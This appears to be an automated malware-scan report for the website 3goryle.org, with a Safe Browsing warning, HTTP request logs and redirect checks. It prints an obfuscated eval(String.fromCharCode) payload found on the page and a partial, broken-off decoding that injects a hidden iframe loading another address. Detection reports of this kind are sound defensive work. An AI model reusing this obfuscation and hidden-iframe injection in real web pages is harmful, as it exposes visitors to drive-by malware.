Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=3goryle.org
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://3goryle.org/ | 200 OK Content-Length: 7070 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,103,101,116,77,111,110,116,104,78,117,109,40,97,98,98,77,111,110,116,104,41,32,123,32,32,32,32,118,97,114,32,97,114,114,77,111,110,32,61,32,110,101,119,32,65,114,114,97,121,40,32,34,74,97,110,34,44,32,34,70,101,98,34,44,32,34,77,97,114,34,44,32,34,65,112,114,34,44,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,34,77,97,121,34,44,32,34,74,117,110,34,44,32,34,74,117,108,34,44,32,34,65,32,117,103,34,44,3
Decoded script:
function getMonthNum(abbMonth) {
    var arrMon = new Array( "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "A ug", "Sep", "Oct", "Nov", "Dec" );
    var i;
    for (i = 0; i < arrMon.length; i++) {
        if (abbMonth == arrMon[i]) {
            return i;
        }
    }
    return -1;
}
function dateUTCdateToDate(dateString) {
    var arrDateStr = dateString.split(" ");
    var month = getMonthNum(arrDateStr[2]);
    var day = arrDateStr[1
        s.setAttribute("src", current_domain);
        document.body.appendChild(s);
    } catch (e) { }
}
/*** called setTimeout with function () {
    try {
        var s = document.createElement("iframe");
        s.style.visibility = "hidden";
        s.style.display = "none";
        s.setAttribute("src", current_domain);
        document.body.appendChild(s);
    } catch (e) { }
}, 500 */
Antivirus reports:
http://3goryle.org/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 3goryle.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Jul 2014 13:43:44 GMT
Accept-Ranges: bytes
ETag: "1b9e-4a9b2d86ae6c0"
Server: Apache
Vary: Accept-Encoding
Content-Length: 7070
Content-Type: text/html
Last-Modified: Thu, 04 Aug 2011 19:18:27 GMT
X-Pad: avoid browser bug
...7070 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 3goryle.org
Referer: http://www.google.com/search?q=3goryle.org
Result:
The result is similar to the first query. There are no suspicious redirects found.